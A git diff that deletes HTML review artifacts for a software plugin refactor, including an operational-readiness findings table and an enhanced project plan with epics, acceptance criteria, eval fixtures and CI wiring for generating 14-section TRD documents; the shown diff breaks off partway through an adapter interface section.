-<td>Internal tooling — no formal on-call. Proxy concerns: (a) what error message a user sees if <code>trd.md</code> generation fails mid-stream; (b) any troubleshooting runbook when <code>/plan-review</code> flags a TRD the user believes is correct; (c) where users report bugs against the new TRD format; (d) what version of the plugin a <code>trd.md</code> was generated by — no provenance stamp on emitted TRDs. The <code>last_aligned_with</code> field helps for drift but not for incident triage.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The refactor has a solid format-correctness safety net (eval fixtures, RED→GREEN paper trail, atomic M1 PR) but lacks a <em>runtime</em> safety net — no continuous CI eval gate, no rollback trigger, no provenance stamping on generated <code>trd.md</code> files, and no failure-mode coverage for mixed-domain repos or interrupted <code>/plan</code> runs.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P0</td>
-<td>OP2</td>
-<td>Add a story to EPIC-3 wiring <code>shield/evals/plan-trd.yaml</code> into a recurring CI job (e.g., <code>.github/workflows/</code>), not just the implementation PR body. Without this, a future <code>plan-docs/SKILL.md</code> edit can silently break the 14-section contract.</td>
-</tr>
-<tr>
-<td>P0</td>
-<td>OP3</td>
-<td>Add an EPIC-1-S2 task: define the failure mode when <code>/plan</code> cannot determine domain (mixed <code>*.tf</code> + <code>package.json</code>). &quot;Mixed → annotate per section&quot; has no AC and no eval fixture.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP6</td>
-<td>Add an explicit rollback-trigger statement to plan-architecture.md §Rollback: &quot;Revert M1 if any of: (a) eval fails on positive fixtures after merge, (b) &gt;N user-reported broken <code>/plan</code> runs within 48 hours, (c) downstream <code>/pm-sync</code> adapter errors trace back to schema 1.2.&quot;</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP6</td>
-<td>Add a task to bump marketplace version in <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per CLAUDE.md &quot;When updating any plugin, bump its version in both…in the same commit&quot;.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP7</td>
-<td>Add an AC under EPIC-1-S2 to emit a provenance comment (e.g., <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code>) at the top of <code>trd.md</code>.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP3</td>
-<td>Add a failure-mode AC: &quot;If <code>/plan</code> cannot write <code>trd.md</code> (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP1</td>
-<td>Consider a lightweight <code>--dry-run</code> or <code>--validate-only</code> mode for <code>/plan</code> so users can verify a TRD passes the eval locally before committing.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7</td>
-<td>Add a one-page troubleshooting block to <code>shield/commands/plan.md</code> listing the top 3 failure modes and recovery steps.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP3</td>
-<td>Add an eval fixture for the M2 backward-compat scenario: <code>/plan-review</code> running against a pre-M1 <code>plan-architecture.md</code>-only folder.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
deleted file mode 100644
index 164d8179..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
+++ /dev/null
@@ -1,396 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="plan-enhanced--plan-trd-refactor">Plan (Enhanced) — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code> · <strong>Phase:</strong> v1 cutover · <strong>Source:</strong> <a href="../../../research.md"><code>../../../research.md</code></a> · <a href="../../../plan-architecture.md"><code>../../../plan-architecture.md</code></a>
-<strong>Sidecar:</strong> <a href="../../../plan.json"><code>../../../plan.json</code></a> (schema v1.1)
-<strong>Review applied:</strong> <a href="summary.md">summary.md</a> (composite B; 6 P0 + 15 P1 + 18 P2 recommendations)</p>
-<h2 id="what-changed-vs-original-planmd">What changed vs original <code>plan.md</code></h2>
-<p>Six P0 fixes and the most consequential P1s have been folded in. Specifically:</p>
-<ul>
-<li><strong>P0-1 fixed:</strong> &quot;13&quot; purged from all artifacts; EPIC-3-S3 AC now correctly references 16 negatives (14 missing-section + 1 drift + 1 vague-TBD)</li>
-<li><strong>P0-2 fixed:</strong> <strong>new EPIC-4-S0</strong> added — adapter package scaffolding (Jira/Confluence/Notion don't exist as <code>uv</code> packages today; only ClickUp does). EPIC-4-S3 now consumes that scaffolding rather than implying it</li>
-<li><strong>P0-3 fixed:</strong> EPIC-4-S3 now specifies the <strong><code>forward_design_refs(task_id, refs) → ForwardResult</code></strong> contract and the <code>globalId = sha256(story_id + anchor_url)[:32]</code> idempotency key</li>
-<li><strong>P0-4 fixed:</strong> <strong>new AC in EPIC-4-S3</strong> — &quot;Running <code>/pm-sync</code> twice in succession produces the same remote state&quot;</li>
-<li><strong>P0-5 fixed:</strong> EPIC-3-S3 renamed to &quot;Wire eval into recurring CI + RED→GREEN paper trail&quot; with an explicit <code>.github/workflows/</code> task</li>
-<li><strong>P0-6 fixed:</strong> EPIC-1-S2 now defines &quot;Mixed → annotate per section&quot; with a worked example; <strong>EPIC-3-S1 adds <code>positive-mixed/</code> fixture</strong></li>
-</ul>
-<p>P1s addressed inline:</p>
-<ul>
-<li>EPIC-2-S2 section_id heuristic (P1-1) and merge semantics (P1-2) now concretely specified</li>
-<li>EPIC-4-S3 adapter file paths (P1-3) enumerated</li>
-<li>EPIC-1-S2 reconciled — domain detection consults repo markers only; <code>.shield.json</code> <code>plan.template_override</code> is the override key (P1-5)</li>
-<li>EPIC-4-S1 gets a stale-anchor detection rule (P1-6)</li>
-<li><strong>New EPIC-2-S3:</strong> JSON Schema validator (P1-7)</li>
-<li>EPIC-4-S3 observability shape spelled out — <code>action='forward_design_ref'</code> with structured fields (P1-8)</li>
-<li>EPIC-1-S2 keeps <code>plan_arch_md</code>/<code>plan_arch_html</code> keys marked <code>deprecated: true</code> (P1-9)</li>
-<li>EPIC-1-S2 gets a provenance-stamp AC (P1-10)</li>
-<li><strong>New EPIC-1-S4:</strong> version bumps in marketplace.json + pyproject.toml (P1-12)</li>
-<li>EPIC-4-S3 gets a tool-and-access requirements subsection naming test tenants + credential storage (P1-13)</li>
-<li>EPIC-1-S2 gets an atomic-write AC (P1-14)</li>
-<li><code>sidecar-schema.md</code> gets a forward-compat policy paragraph (P1-15)</li>
-</ul>
-<p>P2s <strong>deferred</strong> to a follow-up review pass: rollback-trigger language in plan-architecture.md (P1-11 — needs prose addition not a story change), <code>trd_sha</code> content hash, <code>template_version</code> field, round-trip integration eval, <code>--dry-run</code> mode, troubleshooting page, magic-number defenses. See summary.md §P2 for the full list.</p>
-<hr />
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>M1</strong></td>
-<td>TRD cutover</td>
-<td><code>/plan</code> emits <code>trd.md</code> (14 sections, stable anchors, domain-aware prompting for backend/infra, atomic write, provenance stamp); <code>plan.json</code> carries optional <code>design_refs[]</code>; schema validator wired; eval coverage for both domains <strong>plus mixed</strong>; recurring CI gate in place.</td>
-<td>—</td>
-</tr>
-<tr>
-<td><strong>M2</strong></td>
-<td>Review + sync wiring</td>
-<td><code>/plan-review</code> grades against 14-section rubric (with <code>n/a — &lt;reason&gt;</code> escape) + duplication rule + stale-anchor rule; <code>/pm-sync</code> adapters forward <code>design_refs[]</code> as web links with idempotent upsert.</td>
-<td>M1</td>
-</tr>
-<tr>
-<td><strong>M3</strong></td>
-<td>Drift + duplication hardening</td>
-<td><code>last_aligned_with</code> metadata + implementation-manual lint rule.</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--trd-generation-and-storage--m1">EPIC-1 · TRD generation and storage · M1</h2>
-<h3 id="epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting--priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · <code>priority: high</code></h3>
-<p><em>(unchanged from plan.md — see <a href="../../../plan.md#epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting--prioritynbsphigh">plan.md EPIC-1-S1</a>)</em></p>
-<h3 id="epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra--priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · <code>priority: high</code></h3>
-<p>Modify <code>shield/commands/plan.md</code> and <code>shield/skills/general/plan-docs/SKILL.md</code> so <code>/plan</code> writes <code>trd.md</code> with all 14 sections for both backend and infrastructure features. Stop emitting <code>plan-architecture.md</code>. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain from repo markers (with <code>.shield.json</code> <code>plan.template_override</code> as the manual override key) and surfaces the right per-section authoring guidance.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Replace 'Generate plan-architecture.md' with 'Generate trd.md per the unified 14-section template'.</li>
-<li>Update <code>plan-docs/SKILL.md</code> generation prompt to walk 14 sections, select domain-appropriate authoring guidance, emit explicit <code>{#section-id}</code> anchors.</li>
-<li><strong>Domain detection (P1-5):</strong> reuse existing repo-marker detection (<code>*.tf</code> / <code>atmos.yaml</code> / <code>Chart.yaml</code> → infra; <code>pom.xml</code> / <code>pyproject.toml</code> / <code>package.json</code> / <code>go.mod</code> → backend). For manual override, read <code>.shield.json</code> <code>plan.template_override</code> ∈ <code>{infra, backend, mixed}</code>. Document this in <code>shield/commands/plan.md</code>.</li>
-<li><strong>Mixed-domain handling (P0-6):</strong> when both infra and backend markers are detected (or <code>plan.template_override == &quot;mixed&quot;</code>), the generator prepends <code>[backend]</code> and <code>[infra]</code> labels to subsection bullets within each section that has divergent interpretations. Worked example: §11 APIs Involved emits a <code>### [backend] HTTP API contracts</code> subsection AND a <code>### [infra] Module interfaces &amp; cloud-API surface</code> subsection. A <code>positive-mixed/</code> eval fixture in EPIC-3-S1 demonstrates the shape.</li>
-<li><strong>Output-paths deprecation overlap (P1-9):</strong> add <code>plan_trd_md</code> (<code>{output_dir}/{feature}/trd.md</code>) and <code>plan_trd_html</code> (<code>{output_dir}/{feature}/outputs/trd.html</code>) to <code>shield/schema/output-paths.yaml</code>. Keep <code>plan_arch_md</code> and <code>plan_arch_html</code> with <code>deprecated: true</code> in the entry; remove in M3 or a follow-up PR. Mirror in <code>shield/commands/plan.md</code> outputs: frontmatter.</li>
-<li>Update render-markdown helper invocation to render <code>trd.md</code> to <code>outputs/trd.html</code>.</li>
-<li><strong>Provenance stamp (P1-10):</strong> the generator emits a top-of-file HTML comment in <code>trd.md</code>: <code>&lt;!-- generated by /plan v{plugin-version} on {YYYY-MM-DD} --&gt;</code> where <code>{plugin-version}</code> is read from <code>.claude-plugin/marketplace.json</code>.</li>
-<li><strong>Atomic write (P1-14):</strong> the generator writes <code>trd.md.tmp</code> first, then renames to <code>trd.md</code>. If any step fails (template-load error, prompt error, write error), it removes <code>trd.md.tmp</code> and surfaces the error message — never leaves a partial <code>trd.md</code> behind.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/plan</code> in a fresh feature folder writes <code>trd.md</code> and <code>outputs/trd.html</code>.</li>
-<li><code>/plan</code> no longer writes <code>plan-architecture.md</code> anywhere.</li>
-<li><code>output-paths.yaml</code> lists <code>plan_trd_md</code> and <code>plan_trd_html</code>; <code>plan_arch_md</code> and <code>plan_arch_html</code> are marked <code>deprecated: true</code>.</li>
-<li>Running <code>/plan</code> on a folder with only infra markers produces a TRD where infra interpretation dominates §4–7, §11, §14.</li>
-<li>Running <code>/plan</code> on a folder with only backend markers produces a TRD where backend interpretation dominates the same sections.</li>
-<li><strong>(P0-6)</strong> Running <code>/plan</code> on a folder with both infra and backend markers produces a TRD where divergent sections carry <code>[backend]</code> and <code>[infra]</code> labeled subsections.</li>
-<li><strong>(P1-5)</strong> Setting <code>.shield.json</code> <code>plan.template_override</code> to one of <code>{infra, backend, mixed}</code> overrides repo-marker detection.</li>
-<li><strong>(P1-10)</strong> Emitted <code>trd.md</code> carries a <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code> comment as the first line after frontmatter.</li>
-<li><strong>(P1-14)</strong> Killing <code>/plan</code> mid-write (e.g., SIGTERM during generation) does not leave a corrupted <code>trd.md</code>; only <code>trd.md.tmp</code> may remain and is removed on next invocation.</li>
-</ul>
-<h3 id="epic-1-s3--update-existing-feature-behavior-on-re-run--priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run · <code>priority: medium</code></h3>
-<p><em>(unchanged from plan.md)</em></p>
-<h3 id="epic-1-s4--bump-plugin-version-per-claudemd-mandate--priority-high-new--p1-12"><strong>EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · <code>priority: high</code></strong> <em>(new — P1-12)</em></h3>
-<p>CLAUDE.md &quot;Plugin isolation / Versioning&quot; requires bumping <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> in the same commit as any plugin update. The TRD refactor is silent on this; add the bump here.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>.claude-plugin/marketplace.json</code> <code>version</code> field for the Shield plugin entry.</li>
-<li>Bump <code>pyproject.toml</code> version in any package modified (<code>shield/adapters/clickup/pyproject.toml</code>, plus new adapter packages from EPIC-4-S0).</li>
-<li>Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from <code>plan-architecture.md</code> to <code>trd.md</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>The M1 PR includes both version bumps in the same commit as the SKILL.md changes.</li>
-<li>CHANGELOG mentions the cutover and the schema 1.1 → 1.2 bump.</li>
-</ul>
-<hr />
-<h2 id="epic-2--story-schema-and-design-traceability--m1">EPIC-2 · Story schema and design traceability · M1</h2>
-<h3 id="epic-2-s1--extend-planjson-schema-with-optional-design_refs--priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · <code>priority: high</code></h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in the <code>plan.json</code> sidecar. Shape: <code>{doc, component?, section_id, anchor_url, label}</code>. Bump sidecar schema to 1.2; preserve back-compat.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>sidecar-schema.md</code> to add <code>design_refs[]</code> field on the story record.</li>
-<li>Bump version key in schema example from <code>'1.1'</code> to <code>'1.2'</code>.</li>
-<li>Document back-compat: 1.1/1.0 sidecars without <code>design_refs[]</code> remain valid.</li>
-<li><strong>(P1-15)</strong> Add a <strong>forward-compat policy</strong> subsection to <code>sidecar-schema.md</code>: when <code>/plan-review</code> encounters <code>version &gt; current</code>, it warns but does not reject; unknown top-level keys are preserved on round-trip; unknown <code>doc</code> enum values fail validation.</li>
-<li>Add a 'design_refs[] field' subsection with per-field semantics (<code>doc ∈ {trd, lld, prd}</code>; <code>component</code> for LLD scoping; <code>anchor_url</code> stable across heading renames).</li>
-<li><strong>(P2-6)</strong> Add an inline example <code>design_refs[]</code> JSON instance (one TRD ref + one LLD placeholder).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>sidecar-schema.md</code> documents <code>design_refs[]</code> with version 1.2 and a forward-compat policy.</li>
-<li>A <code>plan.json</code> with no <code>design_refs[]</code> still validates as 1.2.</li>
-<li>A <code>plan.json</code> with <code>design_refs[]</code> populated validates as 1.2.</li>
-<li>An inline example is present in the schema doc.</li>
-</ul>
-<h3 id="epic-2-s2--populate-design_refs-when-plan-has-trd-context--priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · <code>priority: high</code></h3>
-<p>When <code>/plan</code> generates stories, populate each story's <code>design_refs[]</code> with a forward link to the TRD section it implements.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Update generation prompt: for each story, emit at least one <code>design_refs</code> entry pointing at a real <code>trd.md#{section-id}</code> anchor.</li>
-<li><strong>(P1-1) Section-ID selection heuristic:</strong> lowercase the story's <code>name</code>, tokenize on whitespace and punctuation, score each TRD section anchor slug by token-overlap count (Jaccard similarity), pick the highest-scoring slug. Tie-break by section order (lower § number wins). If no token overlaps with any slug, fall back to §7 <code>high-level-design</code>.</li>
-<li>For LLD references, emit placeholders with <code>doc='lld'</code>, <code>component=null</code>, <code>anchor_url=null</code>, <code>label='TODO: link when /lld &lt;component&gt; lands'</code>.</li>
-<li><strong>(P1-2) Re-run merge semantics:</strong> on <code>/plan</code> re-run, match existing <code>design_refs[]</code> entries by <code>(doc, section_id, component)</code> tuple. If found: replace <code>label</code> and <code>anchor_url</code> if changed, never duplicate. If a stored entry no longer has a matching TRD section (anchor deleted), preserve it but mark <code>stale: true</code>. New refs append.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A <code>/plan</code> run on a feature with <code>trd.md</code> emits at least one <code>design_refs</code> entry per story.</li>
-<li>Each story has at least one TRD <code>design_ref</code>; LLD refs are TODO placeholders.</li>
-<li><strong>(P1-1)</strong> Story name &quot;Implement POST /users endpoint&quot; resolves to <code>section_id: &quot;api-create-user&quot;</code> if that anchor exists, else <code>high-level-design</code>.</li>
-<li><strong>(P1-2)</strong> Running <code>/plan</code> twice on the same plan does not duplicate <code>design_refs[]</code> entries — verified by an eval fixture.</li>
-<li><strong>(P1-2)</strong> Deleting a TRD section between <code>/plan</code> runs results in the matching <code>design_refs[]</code> entry being marked <code>stale: true</code> (rather than removed).</li>
-</ul>
-<h3 id="epic-2-s3--add-json-schema-validator-for-planjson--priority-high-new--p1-7"><strong>EPIC-2-S3 · Add JSON Schema validator for plan.json · <code>priority: high</code></strong> <em>(new — P1-7)</em></h3>
-<p>Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add it now.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> (preferred — already in the deps tree via clickup adapter) or <code>jsonschema</code>.</li>
-<li>Schema definition lives at <code>shield/schema/plan-sidecar.schema.json</code> (machine-readable counterpart to <code>sidecar-schema.md</code>).</li>
-<li>Validator is invoked by <code>/plan-review</code> (first check) and the eval runner (in EPIC-3).</li>
-<li>Reject unknown <code>doc</code> enum values, enforce <code>design_refs[]</code> cardinality (min 1 per story when populated), reject unknown sidecar versions newer than current.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>uv run shield/scripts/validate_plan.py &lt;path&gt;</code> exits 0 on valid sidecars and non-zero with a named error on invalid ones.</li>
-<li><code>/plan-review</code> invokes the validator before applying rubric checks and aborts on schema failure.</li>
-<li>Sidecar version forward-compat behavior matches the policy in <code>sidecar-schema.md</code> (warn on <code>&gt; current</code>, accept-with-ignored-unknown-keys).</li>
-</ul>
-<hr />
-<h2 id="epic-3--eval-coverage-for-trd-format--m1">EPIC-3 · Eval coverage for TRD format · M1</h2>
-<h3 id="epic-3-s1--author-positive-trd-eval-fixtures-backend--infra--mixed--priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra + mixed) · <code>priority: high</code></h3>
-<p>Create <strong>three</strong> positive fixture <code>trd.md</code> files: backend, infra, <strong>and mixed</strong> (P0-6). The infra fixture uses <code>n/a — &lt;reason&gt;</code> on at least one section; the mixed fixture uses <code>[backend]</code>/<code>[infra]</code> labeled subsections on at least §11 APIs Involved.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> with all 14 sections (Bytebite-style fictional feature).</li>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> with all 14 sections (fictional terraform/atmos change). At least one section uses <code>n/a — &lt;reason&gt;</code>.</li>
-<li><strong>(P0-6)</strong> Author <code>shield/evals/plan-trd/fixtures/positive-mixed/trd.md</code> with all 14 sections for a fictional feature that has both backend code and an infra component (e.g., a new internal microservice with its own RDS instance). §11 APIs Involved demonstrates the <code>[backend]</code> / <code>[infra]</code> labeled-subsection shape.</li>
-<li>Author corresponding <code>plan.json</code> sidecars with <code>design_refs[]</code> entries pointing at fixture <code>trd.md</code> anchors.</li>
-<li>Write <code>shield/evals/plan-trd.yaml</code> with all three positive cases wired.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>All three positive fixtures pass the eval.</li>
-<li>The infra fixture uses <code>n/a — &lt;reason&gt;</code> on at least one section.</li>
-<li>The mixed fixture uses labeled subsections on at least §11.</li>
-<li>Fixtures are self-contained (no external API calls, no LLM dispatches).</li>
-</ul>
-<h3 id="epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures--priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · <code>priority: high</code></h3>
-<p><strong>(P0-1, P0-4)</strong> For each of the 14 required sections, author a fixture that omits it. Add one drift-by-addition fixture (15th section). Add one vague-TBD fixture. <strong>Total: 16 negative fixtures.</strong></p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>14 missing-section fixtures under <code>shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md</code>.</li>
-<li>1 drift-by-addition fixture under <code>shield/evals/plan-trd/fixtures/extra-section/trd.md</code>.</li>
-<li>1 vague-TBD fixture under <code>shield/evals/plan-trd/fixtures/vague-tbd/trd.md</code> (§6 NFRs contains only 'TBD').</li>
-<li>Wire each into <code>shield/evals/plan-trd.yaml</code> with named <code>expected_error</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><strong>16 negative fixtures total</strong> exist and fail with the expected named errors.</li>
-<li>Drift fixture fails with 'unexpected section'; vague-TBD fails with 'vague section content'; missing-section fixtures fail with their section's slug in the error message.</li>
-</ul>
-<h3 id="epic-3-s3--wire-eval-into-recurring-ci--red-green-paper-trail--priority-high-p0-5-p1-4--renamed">EPIC-3-S3 · Wire eval into recurring CI + RED-GREEN paper trail · <code>priority: high</code> <em>(P0-5, P1-4 — renamed)</em></h3>
-<p>Wire <code>shield/evals/plan-trd.yaml</code> into a recurring CI job, not just one-shot PR-body capture. Capture RED→GREEN trail in the implementation PR.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li><strong>(P0-5)</strong> Create or extend <code>.github/workflows/eval-plan-trd.yml</code> (or wire into the existing eval workflow if one exists) that runs <code>uv run shield/evals/run.py plan-trd</code> on every PR touching <code>shield/skills/general/plan-docs/**</code>, <code>shield/schema/**</code>, or <code>shield/evals/plan-trd/**</code>.</li>
-<li>Before any <code>/plan</code> command changes: run the eval and confirm RED.</li>
-<li>After <code>/plan</code> changes land: run the eval and confirm GREEN (3 positives pass; <strong>16 negatives</strong> fail with the right named errors).</li>
-<li>Capture both runs in the implementation PR description.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A GitHub Actions workflow exists that runs the eval on PRs touching the relevant paths.</li>
-<li>The workflow fails the build if the eval reports any fixture mismatch.</li>
-<li>PR body for the M1 cutover contains both RED and GREEN sections, showing <strong>3 positives + 16 negatives</strong> behaving as expected before and after.</li>
-<li>The eval invocation is consistently <code>uv run shield/evals/run.py plan-trd</code> (no &quot;or equivalent&quot; hedge).</li>
-</ul>
-<hr />
-<h2 id="epic-4--plan-review-and-pm-sync-wiring--m2">EPIC-4 · /plan-review and /pm-sync wiring · M2</h2>
-<h3 id="epic-4-s0--scaffold-jira--confluence--notion-adapter-packages--priority-high-new--p0-2"><strong>EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · <code>priority: high</code></strong> <em>(new — P0-2)</em></h3>
-<p>Only <code>shield/adapters/clickup/</code> exists today as a <code>uv</code> package. EPIC-4-S3 implies four adapters land in one story but three of them have no <code>pyproject.toml</code>, no <code>tests/</code>, no MCP server skeleton. Scaffold them first.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/adapters/jira/</code> with <code>pyproject.toml</code> declaring <code>requests</code> (or <code>atlassian-python-api</code>) as a dep, <code>server/</code> skeleton mirroring clickup's layout, <code>tests/</code> directory with a placeholder contract test, and <code>.mcp.json</code> entry.</li>
-<li>Same for <code>shield/adapters/confluence/</code>.</li>
-<li>Same for <code>shield/adapters/notion/</code>.</li>
-<li>Create <code>shield/adapters/_common/design_refs.py</code> exposing the <code>DesignRef</code> dataclass and the <code>forward_design_refs</code> protocol interface (see EPIC-4-S3 for shape).</li>
-<li>Update top-level pyproject if needed to add the new packages to the workspace.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Each new adapter directory has a working <code>pyproject.toml</code> resolvable by <code>uv sync</code>.</li>
-<li>Each new adapter has a placeholder contract test that runs (and may be skipped) under <code>uv run pytest shield/adapters/&lt;tool&gt;/tests/</code>.</li>
-<li><code>shield/adapters/_common/design_refs.py</code> exports <code>DesignRef</code>, <code>ForwardResult</code>, <code>ForwardError</code>, and a protocol/abstract class for <code>forward_design_refs</code>.</li>
-<li><code>.mcp.json</code> entries for the new adapters are present (even if disabled until EPIC-4-S3 lands the real logic).</li>
-</ul>
-<h3 id="epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review--priority-high-p1-6-added">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · <code>priority: high</code> <em>(P1-6 added)</em></h3>
-<p>Extend <code>/plan-review</code> rubric to check 14 required sections, the <code>n/a — &lt;reason&gt;</code> escape, and <strong>stale <code>design_refs[]</code> anchors</strong>.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>TRD section presence rule (imports 14-entry slug allow-list; checks each anchor exists).</li>
-<li>TRD section content rule (accepts real content or <code>n/a — &lt;reason&gt;</code>; flags 'TBD'/empty).</li>
-<li><strong>(P1-6) Stale-anchor rule:</strong> for each story's <code>design_refs[].anchor_url</code>, parse the <code>#section-id</code> and assert it exists in the linked <code>trd.md</code>. Report mismatches as Critical findings.</li>
-<li>Eval fixtures under <code>shield/evals/plan-review-trd/</code> exercising all three rules.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>/plan-review</code> flags missing sections by slug as Critical.</li>
-<li><code>/plan-review</code> does not flag presence/content for valid TRDs (including <code>n/a — &lt;reason&gt;</code>).</li>
-<li>TBD-only sections flag as vague-content Critical.</li>
-<li><code>n/a</code> without reason flags as missing-reason.</li>
-<li><strong>(P1-6)</strong> A <code>plan.json</code> whose story <code>design_refs[].anchor_url</code> points at a non-existent anchor in <code>trd.md</code> flags as Critical with the offending anchor in the message.</li>
-</ul>
-<h3 id="epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review--priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · <code>priority: medium</code></h3>
-<p><em>(unchanged from plan.md)</em></p>
-<h3 id="epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert--priority-high-p0-3-p0-4-p1-3-p1-8-added">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert · <code>priority: high</code> <em>(P0-3, P0-4, P1-3, P1-8 added)</em></h3>
-<p>Update <code>/pm-sync</code> adapters to forward each story's <code>design_refs[]</code> entries as web links on the synced task. Use a deterministic idempotency key to prevent duplicates on re-run.</p>
-<p><strong>Adapter file paths (P1-3):</strong></p>
-<ul>
-<li><code>shield/adapters/clickup/server/tools/sync.py</code> — extend existing</li>
-<li><code>shield/adapters/jira/server/tools/sync.py</code> — new (per EPIC-4-S0)</li>
-<li><code>shield/adapters/confluence/server/tools/sync.py</code> — new</li>
-<li><code>shield/adapters/notion/server/tools/sync.py</code> — new</li>
-</ul>
-<p><strong>Adapter interface contract (P0-3):</strong>
-Each adapter exposes:</p>
